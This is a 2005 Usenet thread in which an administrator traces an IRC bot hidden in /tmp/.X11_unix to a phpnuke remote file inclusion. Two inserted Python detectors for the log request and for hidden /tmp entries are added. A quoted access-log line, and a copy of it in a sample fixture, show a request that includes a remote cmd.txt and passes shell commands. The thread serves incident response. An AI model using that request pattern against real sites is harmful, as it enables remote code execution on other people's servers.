.X11_unix/.unix

    .X11_unix/.unix  
Mark D Smith




 
09-06-05 10:52 PM

Hi

A customer is running an IRC program. I am having problems finding who has
the files installed under /tmp/.X11_unix/.unix with UID/GID apache.

This is on FC3.

Google does not bring up much and apart from firewalling ports 666x to 6669
and killing the daemon, any pointers welcomed.

Mark









    Re: .X11_unix/.unix  
Jake




 
09-08-05 10:48 PM

Mark D Smith wrote:
> Hi
>
> a customer is running an IRC program. i am having problems finding who as
> the files install under /tmp/.X11_unix/.unix with UID/GID apache
>
> This is on FC3
>
> Google does not bring up much and apart from firewalling ports 666x to 6669
> and killing the daemon. any pointers welcomed.
>
> Mark
>


...if it's a customer, grep /var/html/www  or /home/*/public_html for
'irc' and see what it brings up.  You can use lsof to see what's opening
those files, or use ps to keep an eye on what processes are active.

...if it's *not* a customer...   Doh!










    Re: .X11_unix/.unix  
Mark D Smith




 
09-08-05 10:48 PM


"Jake" <NoSpamForMe@here.tld> wrote in message
news:5rWTe.15065$I02.892219@news20.bellglobal.com...
> Mark D Smith wrote: 
>
>
> ...if it's a customer, grep /var/html/www  or /home/*/public_html for
> 'irc' and see what it brings up.  You can use lsof to see what's opening
> those files, or use ps to keep an eye on what processes are active.
>
> ...if it's *not* a customer...   Doh!
>
>
It looks like another issue with phpnuke. Found this in an access_log of a
customer:

/home/domain/domain110/logs/access_log:200.32.121.22 - - [03/Sep/2005:08:44:34 +0100] "GET /phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/jmascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

along with a host of other refs to .X11_unix.

Needless to say, we disabled the customer's phpnuke and informed them to
contact the authors for a patch or newer version.

Mark
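
The log entry in the post above shows the pattern to hunt for: a query parameter (adminpath) whose value is itself a remote URL, followed by a cmd parameter. The following is an added example, not code from the thread, that flags such requests in Apache access logs; the function name, client addresses and attacker.example host are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache common/combined log format, up to the status code.
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+)[^"]*" (\d{3})')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Sep/2005:08:40:01 +0100] "GET /index.php?page=about '
    'HTTP/1.0" 200 1200 "http://www.example.com/" "Mozilla/4.0"',
    '/home/domain/domain110/logs/access_log:203.0.113.7 - - '
    '[03/Sep/2005:08:44:34 +0100] "GET /phpnuke/gallery/displayCategory.php'
    '?adminpath=http://attacker.example/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a'
    ' HTTP/1.0" 200 487 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [03/Sep/2005:09:01:10 +0100] "GET /index.php'
    '?page=http%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.0" 404 210 "-" "-"',
]


def find_remote_includes(lines):
    """Flag requests where a query parameter's value is itself a remote URL."""
    findings = []
    for line in lines:
        if line.startswith("/"):        # "grep -r" prefixes each hit with "path:"
            line = line.split(":", 1)[-1]
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, target, status = m.groups()
        # Split on "&" by hand and decode afterwards, so an encoded
        # "http%3A%2F%2F" value is caught as well as a literal one.
        params = [(k, unquote_plus(v)) for k, _, v in
                  (p.partition("=") for p in urlsplit(target).query.split("&"))]
        for name, value in params:
            if REMOTE_URL.match(value):
                findings.append({
                    "client": ip, "time": when, "status": int(status),
                    "path": urlsplit(target).path, "param": name,
                    "remote": value,
                    # The remaining parameters often carry the command that ran.
                    "other": {k: v for k, v in params if k != name},
                })
    return findings
```

A 200 status on a hit means the script answered the request, so that site and its /tmp activity around the logged time deserve the first look; only the request target is parsed, so a URL in the Referer field does not trigger a finding.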









    Re: .X11_unix/.unix  
Jake




 
09-08-05 10:48 PM

Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:5rWTe.15065$I02.892219@news20.bellglobal.com...
> It looks like another issue with phpnuke. found this in an access_log of a
> customer
>
> /home/domain/domain110/logs/access_log:200.32.121.22 - - [03/Sep/2005:08:44:34 +0100] "GET /phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/jmascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
>
> along with a host of other refs to .X11_unix
>
> needless to say with disabled the customers phpnuke and informed them to
> contact the authors for a patch or newer version.
>
> Mark
>

That'll do it.  Mind if I ask how you discovered the intrusion?








    Re: .X11_unix/.unix  
Mark D Smith




 
09-08-05 10:48 PM


"Jake" <NoSpamForMe@here.tld> wrote in message
news:wNZTe.16121$I02.925006@news20.bellglobal.com...
<snip>
> That'll do it.  Mind if I ask how you discovered the intrusion?

Routine check of /tmp dir for hidden files found .X11_unix dir, which I did
not know what it was. Looked at the files and found the dreaded irc
mentioned. Google found nothing of much help.

Used ps and netstat to find what was running, killed and removed the files.

Post-checked with rkhunter and all looks clean.

Mark
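
The routine /tmp check described in the post above can be scripted. The genuine X socket directory is /tmp/.X11-unix (hyphen), so the .X11_unix name in this thread is a lookalike, and it was owned by the web server account. The following is an added example, not code from the thread; the function name and the EXPECTED list are assumptions to adjust per host.

```python
import os
import stat

# Hidden entries a stock X11 host is expected to have in /tmp (assumption:
# adjust per host). The genuine X socket directory uses a hyphen.
EXPECTED = {".X11-unix", ".ICE-unix", ".font-unix"}


def _fold(name):
    """Fold case and separators so '.X11_unix' compares equal to '.X11-unix'."""
    return name.lower().replace("_", "-")


def sweep_hidden(root, service_uids, expected=EXPECTED):
    """Return findings for hidden top-level entries under root.

    service_uids: numeric uids of accounts (e.g. apache) that should not
    own anything hidden in a temp directory.
    """
    folded = {_fold(e) for e in expected}
    findings = []
    for entry in sorted(os.scandir(root), key=lambda e: e.name):
        if not entry.name.startswith("."):
            continue
        st = entry.stat(follow_symlinks=False)
        reasons = []
        if entry.name not in expected:
            reasons.append("lookalike" if _fold(entry.name) in folded
                           else "unexpected")
        if st.st_uid in service_uids:
            reasons.append("service-owned")
        if not reasons:
            continue
        contents = []
        if stat.S_ISDIR(st.st_mode):
            # os.walk does not follow symlinks by default.
            for dirpath, dirnames, filenames in os.walk(entry.path):
                for name in dirnames + filenames:
                    full = os.path.join(dirpath, name)
                    contents.append(os.path.relpath(full, root))
        findings.append({"path": entry.path, "uid": st.st_uid,
                         "reasons": reasons, "contents": sorted(contents)})
    return findings


if __name__ == "__main__":
    import pwd
    import sys
    uids = {pwd.getpwnam(u).pw_uid for u in sys.argv[1:]}  # e.g. "apache"
    for finding in sweep_hidden("/tmp", uids):
        print(finding)
```

Run it from cron with the web server account name as the argument and record the findings before removing anything, so file ownership and timestamps can still be matched against the access logs.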









    Re: .X11_unix/.unix  
Jake




 
09-08-05 10:48 PM

Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:wNZTe.16121$I02.925006@news20.bellglobal.com...
> <snip>
> 
>
>
> routine check of /tmp dir for hidden files found .X11_unix dir which i did
> not know what it was. looked at the files and found the dreaded irc
> mentioned google found nothing of much help.
>
> used ps and netstat to find what was running, killed and removed the files.
>
> post checked with rkhunter and all looks clean.
>
> Mark
>

rkhunter is a great tool.  I use it in conjunction with chkrootkit and
tripwire.  Makes for a lot of logs every morning but at least I know
what's going on.  Most of the time anyway, nothing's ever 100%. :\







